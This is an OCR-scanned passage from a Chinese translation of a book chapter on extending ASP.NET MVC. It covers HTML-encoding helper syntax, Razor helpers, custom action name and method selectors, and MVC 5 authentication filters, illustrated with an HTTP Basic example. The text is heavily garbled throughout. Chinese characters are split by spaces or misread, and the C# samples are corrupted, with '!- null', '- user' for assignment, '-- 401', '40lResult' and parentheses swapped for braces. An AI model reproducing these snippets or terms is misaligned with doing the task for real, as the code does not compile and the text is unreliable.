供给 该 静态 方法 的 任何 其 他 参数 也 会 变 成 扩展 方法 中 的 参数 , 而 只 有 使 用 this 关 键 字 标记 的 扩 
展 参数 “消失 ”了 。 

ASPNET MVC 1.0 中 的 扩展 方法 都 倾向 于 返回 String 类 型 的 值 ， 并 使 用 类 似 于 下 面 语句 
(Web Forms 视 图 语法 ) 的 调用 格式 直接 把 返回 的 值 放 入 输出 流 中 : 


<%= Html.MyExtensionMethod() $» 


但 使 用 Web Forms 旧 版 本 语法 存在 一 个 问题 : 它 很 容易 产生 让 人 意 想 不 到 的 HTML 转 义 ， 
从 而 产生 错误 。 在 20 世 纪 90 年 代 末 到 21 世 纪 初 , ASPNET 刚 刚 开始 它 的 “生命 旅程 ”， 那 时 的 
Web 世 界 与 今天 相 比 有 很 大 的 差别 ， 那 时 的 Web 应 用 程序 必须 小 心 像 跨 站 脚本 攻击 和 跨 站 请 
求 伪造 攻击 等 常见 的 网 络 攻击 。 为 了 增加 网 络 世界 的 安全 系数 ，ASPNET 4 为 Web Forms] A 
了 自动 编码 HTML 值 的 新 语法 ， 如 下 所 示 : 


«*$: Html.MyExtensionMethod() $» 


注意 ， 这 里 用 冒号 取代 了 等 号 。 这 一 改变 对 于 数据 安全 来 说 意义 重大 ， 但 是 正如 许多 
HTML 辅助 方法 所 做 的 , 当 我 们 真正 需要 返回 HTML 时 会 发 生 什么 ? ASPNET 4 也 引入 了 一 个 
任何 类 型 都 可 以 实现 的 新 接口 (HtmlString)。 当 通过 <%: %> 语 法 传递 字符 串 时 ， 系 统 能 够 识 
别 出 输 入 是 已 经 保证 安全 的 HTML， 并 直接 输出 而 不 进行 编码 处 理 。 在 ASPNET MVC 2 中 ， 开 
发 团队 决定 稍微 打破 向 后 的 兼容 性 ， 使 所 有 HTML 辅 助 方法 都 返回 MvcHtmlString 实 例 。 

当 编 写生 成 HTML 的 HTML 辅 助 方法 时 ， 我 们 几乎 总 是 想 返 回 IHtmlString 而 不 是 String， 
之 所 以 这 样 ， 是 因为 我 们 不 想 让 系统 对 返回 的 HTML 进 行 编码 。 这 对 于 Razor 视 图 引擎 是 非常 
重要 的 ， 它 只 有 一 条 输出 语句 ， 并 且 总 是 被 编码 : 


GHtml.MyExtensionMethod() 


15.2.3 ”编写 Razor 辅 助 方法 


除了 ASPNETMVC 1.0 中 提供 的 HTMLI 辅助 方法 语法 之 外 , 开发 人 员 可 以 使 用 Razor 语 法 编写 
Razor 辅 助 方法 。 这 个 特性 作为 Web Pages 1.0 框 架 的 一 部 分 ， 包 含 在 ASPNET MVC 应 用 程序 中 。 
这 些 辅 助 方法 既 不 能 访问 MVC 辅 助 类 对 象 (如 HtmlHelper、AjaxHelper 和 UrlHelper)， 也 不 能 访 
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问 MVC 上 下 文 对 象 (如 ControllerContext 或 ViewContexb。 但 它们 可 以 通过 传统 的 静态 ASPNET 
API(HttpContext.Current) 来 访问 ASPNET 核 心 运行 时 的 上 下 文 对 象 。 

开发 人 员 为 了 实现 视图 的 简单 重用 , 可 能 会 选择 编写 一 个 Razor 辅 助 方法 , 或 者 他 们 想 习 
来 自 一 个 ASPNETMVC 应 用 程序 和 一 个 Web Pages 应 用 程序 的 共同 辅助 代码 ， 再 或 者 他 们 
构建 的 应 用 程序 是 这 两 种 情况 的 结合 。 对 于 纯粹 的 ASPNET MVC 开 发 人 员 而 言 ， 传 统 的 
HTML 辅 助 方 法 路 由 提供 了 更 大 灵活 性 和 可 定制 性 ， 但 语法 稍微 多 长。 


ig 


注意 ”如果 想 了 解 编写 Razor 辅 助 方法 的 更 多 详情 ,请 参阅 Jon Galloway 的 博 
客 “Comparing MVC 3 Helpers: Using Extension Methods and Declarative Razor 
@helper Syntax ” , 网 Xt 为 http//weblogs.asp.net/jongalloway/comparing- 
Imvc-3-helpers-using-extension-methods-and-declarative-razorhelper。 尽 管 Jon 的 博 
客 介绍 的 是 MVC 3 的 内 容 ， 但 是 他 介绍 的 主题 仍然 适用 于 在 MVC 5 中 编写 Razor 
辅助 方法 的 开发 人 员 。 


15.3 ”控制 器 扩展 


控制 器 操作 是 把 整个 应 用 程序 连接 在 一 块 儿 的 黏合 剂 ， 它 们 通过 数据 访问 层 与 模型 对 
话 ， 对 如 何 实现 用 户 要 求 的 活动 做 出 初步 决定 ， 并 决定 如 何 使 用 视图 、JSON、XML 等 做 出 
响应 。 对 如 何 选择 和 执行 操作 进行 自 定 义 是 扩展 ASPNET MVC 的 一 个 重要 方面 。 


15.3.1 操作 选择 


ASPNET MVC 通 过 两 种 机 制 来 影响 操作 的 选择 : 选择 操作 名 称 和 选择 (过 滤 的 ) 操 作 方法 。 
1. 用 名 称 选择 器 选择 操作 名 称 


重 命名 操作 可 以 通过 派生 于 基 类 ActionNameSelectorAttribute 的 特性 来 处 理 。 操 作 名 称 选 择 
的 最 常见 用 法 是 通过 ASPNET MVC 框 架 附带 的 [ActionName] 特 性 。 该 特性 允许 用 户 指定 一 个 
替代 名 称 ， 并 将 指定 的 替代 名 称 直接 附加 到 操作 方法 本 身 。 需 要 更 加 动态 名 称 映射 的 开发 人 
员 可 以 实现 派生 于 ActionNameSelectorAttribute 的 自 定义 特性 。 

实现 ActionNameSelector 是 一 项 简单 任务 : 实现 IsValidName 抽 象 方法 , 并 返回 true 或 false， 
以 判断 请 求 的 名 称 是 否 有 效 。 由 于 允许 操作 名 称 选择 器 对 一 个 名 称 是 否 有 效 进行 投票 ， 因 此 
可 以 延迟 到 知道 请 求 的 名 称 后 再 作出 决定 。 例 如 ， 如 果 想 要 一 个 可 以 处 理 任何 以 “product-” 
开头 的 操作 (可 能 是 用 来 映射 某 个 不 能 控制 的 现 有 URL)。 通 过 实现 一 个 自 定义 的 名 称 选择 器 ， 
可 以 非常 轻松 地 实现 这 一 操作 : 

public override bool IsValidName (ControllerContext controllerContext, 

string actionName, 


MethodInfo methodInfo) ( 
return actionName.StartsWith ("product-"); 


H 
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当 把 该 新 特性 应 用 到 一 个 操作 方法 时 ， 它 可 以 响应 以 “product-” 开 头 的 任何 操作 。 操 作 
仍然 需要 做 很 多 实际 操作 名 称 的 解析 工作 来 提取 额外 的 信息 。 在 ~/Areas/ActionNameSelector 
的 代码 中 有 这 样 一 个 例子 ， 其 中 包括 来 自 操作 名 称 的 产品 人 D 的 解析 并 把 解析 出 的 值 放 入 路 由 
数据 中 ， 以 便 开发 人 员 以 后 对 该 值 进行 模型 绑 定 。 


2. 使 用 方法 选择 器 过 滤 操作 


另 一 个 操作 选择 扩展 是 过 滤器 操作 。 方 法 选择 器 是 派生 自 ActionMethodSelectorAttribute 的 一 
个 特性 类 。 与 操作 名 称 选 择 非常 类 似 ， 它 涉及 了 一 个 抽象 方法 ， 该 方法 可 用 来 检查 控制 器 上 
下 文 和 方法 , 并 判断 该 方法 是 否 符合 请 求 要 求 。ASPNET MVC 框 架 提供 了 该 特性 的 几 个 内 置 
实现 : [AcceptVerbs]( 以 及 与 它 相 近 的 相关 特性 [HttpGet]、 [HttpPost]、 [HttpPut]、 [HttpDelete]. 
[HttpHead]、[HttpPatch]、[HttpOptions] 等 ) 和 [NonAction]。 

如 果 当 ASPNET MVC 调 用 它 的 IsValidForRequest 方 法 时 ， 方 法 选择 器 返回 了 false， 那 么 
对 于 给 定 请 求 来 说 ， 该 方法 则 不 被 认为 是 有 效 的 ， 系 统 会 继续 查找 匹配 。 如 果 这 个 方法 没有 
选择 器 ， 那 么 它 就 会 被 考虑 成 潜在 的 有 效 调度 目标 ， 相反， 如 果 方 法 有 一 个 或 多 个 选择 器 ， 
它们 通过 返回 true 都 会 同意 该 方法 是 一 个 有 效 的 目标 。 

如 果 找 不 到 匹配 方法 ， 那 么 系统 就 会 在 对 请 求 的 响应 中 ， 返 回 一 个 HTTP 404 错 误 代码 。 
同样 ， 如 果 有 多 个 方法 匹配 请 求 ， 系 统 将 返回 一 个 HTTP 500 错 误 代码 ， 并 在 错误 页 面 上 告知 
方法 匹配 存在 二 义 性 。 

为 什么 [Authorize] 没 有 出 现在 前 面 的 列表 中 呢 ?” 因 为 [Authorize] 的 正确 操作 要 么 允许 请 
求 ， 要 么 返回 一 个 HTTP 401(“ 未 经 授权 ”) 错 误 代 码 ， 以 便 浏览 器 知道 我 们 需要 身份 验证 。 
另 一 种 考虑 是 ， 对 于 [AcceptVerbs] 或 [NonAction]， 最 终 用 户 不 能 使 请 求 有 效 ， 它 总 是 无 效 的 ， 
因为 它 使 用 了 错误 的 HTTP 动 词 ， 或 者 试图 调用 一 个 非 操作 的 方法 ， 然 而 [Authorize] 允 许 最 终 
用 户 做 一 些 处 理 ， 最 终 使 请 求 成 功 。 这 便 是 操作 过 滤器 ( 像 [Authorize]) 和 方法 选择 器 ( 像 
[AcceptVerbs]) 的 关键 区 别 。 

使 用 自 定义 方法 选择 器 的 一 个 例子 便 是 区 分 Ajax 请 求 和 非 Ajax 请 求 。 我 们 可 以 使 用 新 的 
IsValidForRequest 方 法 实现 一 个 新 的 [AjaxOnly] 操 作 方法 选择 器 ， 代 码 如 下 : 

public override bool IsValidForRequest (ControllerContext controllerContext, 

MethodInfo methodInfo) ( 


return controllerContext.HttpContext.Request.IsAjaxRequest(); 
) 


通过 我 们 Ajax 的 例子 ， 结 合 方法 选择 器 存在 与 否 的 规则 ， 我 们 可 以 得 出 结论 ， 没 有 装饰 
的 操作 方法 都 是 Ajax 和 非 Ajax 请 求 的 有 效 目标 。 当 请 求 是 一 个 非 Ajax 请 求 时 ， 使 用 AjaxOnly 
特性 装饰 方法 都 会 从 有 效 目标 列表 中 过 滤 掉 。 

使 用 像 这 样 的 一 个 特性 ， 我 们 可 以 创建 拥有 相同 名 称 的 独立 操作 方法 ， 创 建 的 这 些 方法 
可 以 根据 用 户 是 在 浏览 器 中 做 直接 请 求 ， 还 是 在 做 编程 性 的 Ajax 请 求 来 调度 。 我 们 可 能 根据 
用 户 是 在 做 一 个 完整 的 请 求 还 是 在 做 一 个 Ajax 请 求 来 选择 做 不 同 的 工作 。 我 们 可 以 在 
~/Areas/ActionMethodSelector 中 找到 这 样 一 个 完整 示例 ， 其 中 包含 了 [AjaxOnly] 特 性 的 实现 ， 
并 展示 了 系统 根据 用 户 是 做 完整 请 求 还 是 做 Ajax 请 求 而 在 两 个 mdex 方 法 之 间 做 出 选择 的 控 
制 器 和 视图 的 实现 。 
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15.3.2 ”操作 过 滤器 


一 个 操作 方法 一 旦 被 选中 就 会 立即 执行 ， 并 且 如 果 它 返回 一 个 结果 ， 返 回 的 结果 也 会 随 
后 执行 。 操 作 过 滤器 允许 开发 人 员 以 5 种 方式 参与 操作 和 结果 执行 管道 : 

e 身份 验证 

e 授权 

e 操作 前 后 处 理 

o 结果 前 后 处 理 

e 错误 处 理 

还 有 另外 一 种 过 滤器 ， 即 重 写 过 滤器 ， 它 允许 为 全 局 或 控制 器 过 滤器 的 默认 集合 指定 例 
外 情况 。 

操作 过 滤器 可 以 作为 直接 应 用 于 操作 方法 或 控制 器 类 的 特性 来 编写 ， 或 者 作为 在 全 局 过 
滤器 列表 中 注册 的 单独 类 来 编写 。 如 果 打 算 将 编写 的 操作 过 滤器 作为 特性 来 使 用 ， 那 么 它 必 
须 继 承 自 FilterAttribute 或 者 它 的 任何 子 类 ， 如 ActionFilterAttribute。 不 作为 特性 使 用 的 全 局 操 
作 过 滤器 没有 对 这 个 基 类 的 要 求 。 无 论 采 取 哪 个 路 由 ， 操 作 过 滤器 支持 的 过 滤 活 动 都 由 实现 
的 接口 决定 。 


1. 身份 验证 过 滤器 


MVC 5 中 新 增 的 身份 验证 过 滤器 支持 在 控制 器 级 和 操作 级 自 定 义 身份 验证 。HTTP 的 设 
计 人 允许 对 每 个 资源 (URD 进 行 不 同 的 身份 验证 ,但 是 传统 的 Web 框 架 不 支持 这 种 灵活 性 。 传 统 
的 Web 框 架 支持 为 每 个 应 用 程序 配置 身份 验证 。 这 种 方法 让 为 整个 站 点 开启 Windows 或 Forms 
身份 验证 很 容易 。 当 站 点 中 的 每 个 操作 都 具有 完全 相同 的 身份 验证 需求 时 ， 这 种 服务 器 配置 
方法 的 效果 很 好 。 但 是 ， 现 代 的 Web 应 用 程序 通常 对 于 不 同 的 操作 有 不 同 的 身份 验证 需求 。 
例如 ， 可 能 有 一 些 操作 会 被 浏览 器 中 的 JavaScript 调 用 ， 并 返回 JSON 格 式 的 数据 。 这 些 操作 
可 能 使 用 不 记名 令 牌 而 不 是 cookie， 从 而 可 以 防御 跨 站 请 求 伪造 攻击 ， 也 就 不 需要 使 用 防伪 
令 牌 。 如 果 是 以 前 ， 就 不 得 不 求助 于 其 他 的 技术 ， 如 站 点 分 区 ， 为 每 一 组 身份 验证 方法 使 用 
一 个 子 应 用 程序 。 但 是 ， 这 种 方法 很 混乱 ， 让 开发 和 部 署 都 变 得 复杂 起 来 。 

MVC 5 通过 身份 验证 过 滤器 ， 为 这 个 问题 提供 了 一 个 整洁 的 解决 方案 。 为 了 支持 为 单独 
的 控制 器 或 操作 使 用 不 同 的 身份 验证 方法 ， 可 以 应 用 一 个 身份 验证 过 滤器 特性 ， 这 样 就 只 有 
该 控制 器 或 操作 会 使 用 这 个 过 滤器 特性 。~/Areas/BasicAuthenticationFilter 下 的 示例 展示 了 如 
何 为 某 个 控制 器 上 的 特定 操作 使 用 HTTP Basic 身 份 验证 。 


注意 添加 身份 验证 特性 时 ， 要 记得 在 进行 安全 分 析 时 考虑 到 服务 器 级 的 
身份 验证 配置 。 添 加 了 身份 验证 特性 ， 并 不 意味 着 阻止 了 服务 器 启用 的 其 他 方 
法 。 添 加 身份 验证 过 滤器 ， 只 是 添加 了 又 一 个 支持 的 身份 验证 选项 。 一 些 身份 
验证 方法 ， 如 Forms(cookies)， 要 求 防御 跨 站 请 求 伪造 攻击 。 启 用 这 些 方法 时 ， 


操作 可 能 需要 使 用 防伪 令 牌 。 其 他 方法 ， 如 不 记名 令 牌 ， 则 没有 这 个 问题 。 操 
作 是 否 需要 使 用 防伪 令 牌 ， 取 决 于 为 该 操作 启用 的 所 有 身份 验证 方法 的 集合 ， 
包括 在 服务 器 级 使 用 的 方法 。 哪怕 只 有 一 个 启用 的 身份 验证 方法 需要 防伪 令 牌 ， 
操作 就 需要 使 用 防伪 令 牌 。 
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MVC 


所 以 ， 如 果 操作 使 用 了 不 记名 令 牌 身份 验证 ， 我 们 也 想 避 免 为 防伪 令 牌 编 


些 工作 。 

主动 的 OWIN 中 间 件 的 工作 方式 是 一 样 的 。 为 了 仅 支 持 不 记名 令 牌 ， 需 要 以 
不 同 的 方式 来 处 理 基 于 cookie 的 身份 验证 。 仅 为 一 个 操作 关闭 服务 器 身份 验证 方 
法 并 不 容易 。 可 以 选择 的 一 种 方法 是 完全 不 使 用 服务 器 级 身份 验证 ， 而 只 使 用 
MVC 身 份 验证 过 滤器 。 使 用 这 种 方法 时 ， 每 当 操作 需要 执行 与 控制 器 或 全 局 默 
认 设 置 不 同 的 工作 时 ， 就 可 以 使 用 过 滤器 重 写 。 关 于 过 滤器 重 写 具体 有 哪些 帮 
助 ， 请 参看 本 章 后 面 的 “过 滤器 重 写 ” 一 节 。 


写 代码 , 那么 就 必须 确保 攻击 者 不 能 使 用 服务 器 启用 的 cookie 通 过 身份 验证 来 使 
用 该 方法 。 如 果 启 用 了 标准 的 ASPNET Forms 身 份 验证 , 就 要 在 服务 器 级 完成 这 


MVC 5 没有 为 IAuthenticationFilter 接 口 包 含 基 类 ， 也 没有 实现 该 接口 。 所 以 ， 如 果 要 支持 
对 单独 操作 或 单独 控制 器 进行 身份 验证 ， 就 需要 了 解 如 何 实现 该 接口 。 将 过 滤器 作为 特性 实 


现 后 ， 应 用 到 操作 就 很 简单 了 : 


public ActionResult Index() 
{ 


return View() 


[BasicAuthentication (Password = "secret")] 

[Authorize] 

public ActionResult Authenticated() 

t 
User model = new User ( Name = User.Identity.Name }; 
return View (model); 

} 


理解 这 两 个 特性 如 何 协同 工作 很 有 帮助 。 必 须 使 用 这 两 个 特性 ， 才 能 让 浏览 器 提示 


注意 ， 本 例 中 的 Authenticated 操 作 有 两 个 特性 : 一 个 身份 验证 过 滤器 和 一 个 授权 过 滤器 。 


用 户 


通过 HTTP Basic 进 行 登录 。 如 果 传 入 的 请 求 恰好 具有 正确 的 头 部 ， 那 么 仅 有 身份 验证 过 滤器 
自己 就 足以 处 理 该 头 部 了 。 但 是 ， 身 份 验证 过 滤器 自己 不 足以 要 求 身份 验证 ， 或 者 让 浏览 器 
在 一 开始 发 送 一 个 经 过 身份 验证 的 请 求 。 对 于 该 目的 ， 还 需要 使 用 Authorize 特 性 来 阻止 匿名 
请 求 。Authorize 特 性 使 得 MVC 在 收 到 匿名 请 求 时 ， 发 回 一 个 401 Unauthorized 状 态 码 。 然 后 ， 


身份 验证 过 滤器 检查 该 状态 码 ， 并 要 求 浏览 器 发 起 身份 验证 对 话 。 


有 身份 验证 过 滤器 、 但 是 没有 授权 过 滤器 的 操作 就 像 许多 首页 一 样 ， 允 许 匿名 用 户 和 认 
证 用 户 访问 ， 但 是 会 根据 用 户 是 否 已 登录 ， 显 示 不 同 的 内 容 。 既 有 身份 验证 过 滤器 、 又 有 授 


权 过 滤器 的 操作 就 像 一 个 “只 允许 订阅 者 访问 ”的 页 面 ， 只 向 认证 用 户 返 回 内 容 。 


实现 身份 验证 过 滤器 涉及 两 个 方法 : OnAuthentication 和 OnAuthenticationChallenge。 示 例 
代码 中 的 OnAuthentication 方 法 执行 一 些 相当 低级 的 工作 ， 来 处 理 HTTP Basic 协 议 的 细节 。 如 
果 对 该 协议 的 细节 感 兴趣 ， 请 在 tools.ietforg 上 查看 RFC 2617 的 第 2 节 ， 以 及 示例 的 完整 源 代 
码 。 下 面 ， 我 们 跳 过 协议 的 一 些 细节 ， 并 专注 在 示例 的 高 级 别 身 份 验证 过 滤器 的 行为 上 。 


public void OnAuthentication(AuthenticationContext filterContext) 
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t 
if (!RequestHasAuthorizationBasicHeader()) 


return; 


IPrincipal user = TryToAuthenticateUser(); 


if (user !- null) 


// When user !- null, the request had a valid user ID and password. 
filterContext.Principal - user; 


) 
else 


// Otherwise, authentication failed. 
filterContext.Result = CreateUnauthorizedResult(); 


) 
) 


比较 上 面 的 代码 段 和 完整 的 示例 源 代码 会 发 现 ， 上 面 的 代码 段 中 有 一 些 占 位 符 方法 ， 
而 没有 显示 其 完整 实现 。 这 段 代 码 强调 了 过 滤器 的 OnAuthentication 方 法 中 能 够 执行 的 三 个 
操作 : 

e 如 果 未 进行 身份 验证 ， 过 滤器 什么 都 不 能 做 。 

e 过 滤器 可 通过 设置 Principal 属 性 ， 指 示 成 功 的 身份 验证 。 

e 过 滤器 可 通过 设置 Result 属 性 ， 指 示 失 败 的 身份 验证 。 

图 15-1 总 结 了 实现 OnAuthentication 的 方法 。 

实现 OnAuthentication 


| 尝试 进行 这 种 身份 验证 了 吗 ? 


什么 都 不 做 


是 


| 身份 验证 成 功 了 吗 ? 


8 
设置 Result 


是 


| 设置 Principal 
图 15-1 
如 果 请 求 没有 尝试 通过 此 过 滤器 的 身份 验证 (在 本 例 中 ，Anthorization: Basic 头 部 表示 
HTTP Basic 身 份 验证 )， 那 么 过 滤器 应 该 返回 ， 并 且 不 执行 任何 操作 。 多 个 身份 验证 过 滤器 可 
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以 同时 处 于 活跃 状态 ， 为 了 彼此 互 不 打扰 ， 过 滤器 应 该 只 对 尝试 使 用 其 身份 验证 方法 的 请 求 
进行 处 理 。 例如, 一 个 基于 cookie 的 身份 验证 过 滤器 只 有 在 检测 到 存在 其 cookie 时 才 会 执行 操 
作 。 如 果 没 有 检测 到 匹配 的 身份 验证 尝试 ， 过 滤器 应 该 确保 自己 不 会 设置 Principal 属 性 (表示 
成 功 ) 和 Result 属 性 (表示 失败 )。 一 个 “没有 尝试 身份 验证 ”的 请 求 与 一 个 “尝试 身份 验证 但 
是 失败 ”的 请 求 是 不 同 的 ， 处 理 “ 没 有 尝试 身份 验证 ”的 请 求 的 正确 方法 是 什么 都 不 做 。 

当 身 份 验证 过 滤器 设置 表示 成 功 的 Principal 属 性 时 ， 剩 余 的 所 有 身份 验证 过 滤器 都 会 运 
行 ， 并且 除非 后 面 的 某 个 身份 验证 过 滤器 失败 ， 否 则 标准 管道 会 继续 进行 ， 运 行 授权 过 滤器 
和 其 他 过 滤器 类 型 ， 以 及 运行 操作 方法 。 最 后 一 个 身份 验证 过 滤器 提供 的 Principal 属 性 会 被 
传递 给 管道 剩余 部 分 的 所 有 标准 位 置 ， 如 Thread.CurrentPrincipal、HttpContext,CurrentUser 和 
Controller User。 如 果 一 个 身份 验证 过 滤器 想 要 将 自己 的 结果 与 之 前 一 个 身份 验证 过 滤器 的 结 
果 合 并 起 来 ， 就 可 以 在 重 写 AuthenticationContext 的 当前 Principal 属 性 之 前 检查 该 属性 。 

当 身 份 验证 过 滤器 设置 表示 失败 的 Result 属 性 时 ，MVC 会 停止 运行 管道 的 剩余 部 分 ， 包 
括 后 面 的 过 滤器 类 型 和 操作 方法 。 相 反 ，MVC 会 立即 对 该 操作 的 所 有 身份 验证 过 滤器 运行 质 
询 (challenge)， 然 后 返回 。 我 们 马上 详细 讨论 身份 验证 质询 。 

身份 验证 过 滤器 的 另外 一 部 分 告诉 浏览 器 (或 客户 端 ) 如 何 进行 身份 验证 。 这 部 分 工作 由 
OnAuthenticationChallenge 方 法 完成 。 对 于 HTTP Basic 身 份 验 证 , 只 需要 向 带 有 401 Unauthorized 
状态 码 的 响应 中 添加 一 个 WWW-Authenticate: Basic 头 部 。OnAnuthenticationChallenge 方 法 会 在 
每 个 响应 上 运行 ， 并 且 刚 好 在 操作 结果 执行 之 前 运行 。 因 为 操作 结果 还 没有 执行 ， 所 以 
OnAnuthenticationChallenge 方 法 不 能 执行 检查 状态 码 等 操作 。 相 反 ， 该 方法 会 通过 替换 Result 
属性 来 重 写 现 有 操作 结果 。 在 结果 中 ， 该 方法 在 现 有 结果 运行 后 立即 检查 状态 码 ， 然 后 添加 
WWW-Authenticate 头 部 。 整 体 行为 如 下 面 的 代码 所 示 ( 为 简单 起 见 ， 稍 微 做 了 修改 ): 


public void OnAuthenticationChallenge( 
AuthenticationChallengeContext filterContext) 


{ 
filterContext.Result = new AddBasicChallengeOn40lResult 
{ InnerResult = filterContext.Result }; 


class AddBasicChallengeOon40lResult : ActionResult 
{ 
public ActionResult InnerResult { get; set; } 


public override void ExecuteResult (ControllerContext context) 
t 
InnerResult.ExecuteResult (context); 


var response - context.HttpContext.Response; 


if (response.StatusCode -- 401) 
t 

response.Headers.Add("WWW-Authenticate", "Basic"); 
} 
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这 段 代 码 是 装饰 模式 的 一 个 例子 。OnAuthenticationChallenge 通 过 获得 对 现 有 结果 的 引 
和 ， 委 托 到 现 有 结果 ， 然 后 在 现 有 结果 上 添加 一 些 额外 的 行为 来 封装 (或 叫 装饰 ) 现 有 结果 (在 
本 例 中 , 所 有 额外 的 行为 在 委托 之 后 发 生 )。 例 子 中 的 AddChallengeOnUnauthorizedResult 类 比 
较 通 用 ， 所 以 可 用 于 任何 HTTP 身份 验证 方案 ， 而 不 只 是 Basic 方 案 。 这 样 一 来 ， 多 个 身份 验 
证 过 滤器 就 可 以 重用 相同 的 质询 操作 结果 类 。 
关于 质询 操作 结果 ， 需 要 记 住 重要 的 三 点 : 
e 它们 运行 在 所 有 响应 上 ， 而 不 只 是 身份 验证 失败 或 401 Unauthorized。 除 非 想 要 在 每 
个 200 OK 响应 上 添加 头 部 ， 否 则 一 定 要 首先 检查 状态 码 。 
e 质询 操作 结果 会 蔡 换 管道 其 余部 分 生成 的 操作 结果 。 除非 想 要 忽略 泻 染 操作 方法 返回 
的 ViewO 结 果 ， 和 否则 请 确保 首先 传递 并 执行 当前 结果 ， 就 像 示 例 中 做 的 那样 。 
e 可 以 运行 多 个 身份 验证 过 滤器 ， 它 们 的 质询 都 会 运行 。 例 如 ， 如 果 有 Basic、Digest 
和 Bearer 的 身份 验证 过 滤器 , 那么 每 个 身份 验证 过 滤器 都 会 添加 自己 的 身份 验证 头 部 。 
因此 ， 除 非 想 要 重 写 其 他 过 滤器 的 输出 ， 否 则 确保 对 响应 消息 做 的 任何 修改 都 是 补充 
性 的 。 例 如 ， 应 当 添 加 新 的 身份 验证 头 部 ， 而 不 是 设置 一 个 替换 值 。 


为 什么 身份 验证 质询 运行 在 所 有 结果 上 (包括 200 OK)? 

如 果 身 份 验证 质询 只 运行 在 401 Unauthorized 结 果 上 ， 事 情 就 简单 得 多 。 但 是 很 遗憾 ， 至 
少 有 一 种 身份 验证 机 制 (Negotiate) 有 时 候 会 向 非 401 响 应 (甚至 200 OK) 添 加 
WWW-Authenticate 头 部 。 我 们 希望 身份 验证 过 滤器 合约 能 够 支持 所 有 身份 验证 机 制 ， 所 以 不 
需要 做 401 Unauthorized 检 查 。 运 行 在 401 上 是 很 常见 的 情形 ， 但 是 并 非 一 定 如 此 。 


即使 当 我 们 的 OnAuthentication 方 法 通过 设置 Result 属 性 表示 失败 时 , 质询 方法 也 会 运行 。 
所 以 ，OnAuthenticationChallenge 方 法 总 是 会 运行 的 ， 不 管 管道 正常 运行 ， 另 外 一 个 身份 验证 
过 滤器 短路 失败 ， 还 是 同一 个 身份 验证 过 滤器 实例 短路 失败 。 在 所 有 三 种 情况 中 ， 我 们 都 希 
望 确保 质询 结果 执行 正确 的 操作 。 

在 HTTP Basic 示 例 实 现 中 ， 我 们 总 是 会 设置 一 个 质询 结果 。 一 些 身份 验证 机 制 可 能 根本 
不 需要 质询 。 例 如 ， 可 能 有 一 个 从 编程 客户 端 调用 的 操作 ， 并 且 该 操作 返回 JSON。 这 个 操作 
可 能 支持 HTTP Basic 作 为 主 身份 验证 机 制 ， 但 是 也 允许 使 用 cookie 作 为 次 要 身份 验证 机 制 。 
在 这 种 情况 中 , 我 们 不 会 希望 让 cookie 身 份 验 证 过 滤器 做 任何 质询 , 比如 发 送 一 个 302 Redirect 
到 登录 表单 ， 因 为 那 会 破坏 提示 进行 HTTP Basic 身 份 验 证 。 


© 注意 “一 些 身份 验证 机 制 不 能 同时 质询 。 例 如 ， 基 于 表单 的 身份 验证 系统 | 
会 发 送 一 个 302 Redirect 到 登录 表单 ， 而 Basic、Digest、Bearer 等 会 向 401 

Unauthorized 响 应 添加 一 个 WWW-Authenticate 头 部 。 因 为 我 们 必须 为 每 个 响应 选 | 
择 一 个 状态 码 ， 所 以 不 能 在 同一 个 操作 中 同时 为 Forms 和 HTTP 身 份 验证 机 制 使 | 
用 质询 。 | 


当 不 希望 某 个 过 滤器 做 身份 验证 质询 时 ， 就 可 以 简单 地 保持 现 有 的 Result 属 性 不 变 ; 在 
OnAuthenticationChallenge 方 法 中 什么 都 不 用 做 。 对 于 需要 质询 的 过 滤器 ， 可 以 添加 一 行 简单 
的 代码 ， 总 是 封装 现 有 结果 ， 就 像 示例 中 做 的 那样 。 在 OnAuthenticationChallenge 方 法 中 ， 并 
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不 需要 做 任何 复杂 操作 。 因 为 操作 结果 还 没有 运行 ， 所 以 不 太 可 能 需要 在 
OnAuthenticationChallenge 方 法 中 运行 任何 条 件 逻 辑 。 要 么 始终 用 质询 来 封装 现 有 的 结果 方 
法 ， 要 么 什么 都 不 做 ;更 复杂 的 操作 在 这 里 没有 意义 。 

身份 验证 过 滤器 十 分 强大 ， 并 且 经 过 了 定制 ， 用 于 恰当 地 处 理 HTTP 身 份 验证 。 我 们 介 
绍 了 大 量 细节 ， 不 过 不 要 望 而 生 上 其 。 正 如 图 15-1 总 结 了 如 何 实现 OnAuthentication"， 图 15-2 总 
结 了 如 何 实现 OnAuthenticationChallenge。 参考 这 两 幅 图 , 享受 在 MVC 中 使 用 过 滤器 带 来 的 为 
单独 资源 设置 身份 验证 的 灵活 性 。 


实现 OnAuthenticationChallenge 


| 身份 验证 方法 支持 质询 吗 ? 


什么 都 不 做 


2. 授权 过 滤器 


参与 授权 的 操作 过 滤器 需要 实现 [AuthorizationFilter 接 口 。 授权 过 滤器 在 身份 验证 过 滤器 之 
后 执行 。 因 为 它们 在 操作 管道 中 的 执行 相当 早 ， 所 以 它们 很 适合 用 来 短路 整个 操作 的 执行 。 
ASPNET MVC 框 架 中 有 一 些 类 实现 了 该 接口 ， 其 中 包括 [Authorize] 、[ChildActionOnly] ~ 
[RequireHttps]、[ValidateAntiForgeryToken] 和 [ValidateInput] 等 。 

开发 人 员 可 能 会 选择 实现 授权 过 滤器 ， 以 实现 当 某 个 先决 条 件 不 能 满足 时 或 者 希望 结果 
不 是 返回 HTTP 404 错 误 代码 时 ， 从 操作 管道 中 提前 跳出 。 


3. 操作 和 结果 过 滤器 


参与 操作 前 后 处 理 的 操作 过 滤器 需要 实现 IActionFilter 接 口 , 该 接口 提供 了 两 个 需要 实现 
的 方法 : OnActionExecuting( 用 于 前 处 理 ) 和 OnActionExecuted( 用 于 后 处 理 )。 同 样 ， 参 与 结果 
前 后 处 理 的 操作 过 滤器 需要 实现 IResultFilter 接 口 和 它 的 两 个 过 滤器 方法 : OnResultExecuting 
和 OnResultExecuted。ASPNET MVC 框 架 本 身 提供 了 两 个 操作 /结果 过 滤器 : [AsyncTimeout] 
和 [OutputCache]。 单 个 操作 过 滤器 经 常 把 这 两 个 接口 作为 一 对 来 实现 ， 因 此 ， 把 它们 放 在 一 
块 介绍 是 很 有 意义 的 。 

输出 缓存 过 滤器 是 应 用 这 对 操作 和 结果 过 滤器 的 典型 示例 。 它 重 写 了 OnActionExecuting 方 法 
来 决定 它 是 否 已 经 有 一 个 缓存 结果 ， 从 而 可 以 绕 过 操作 和 结果 的 执行 ， 而 直接 从 它 的 缓存 中 
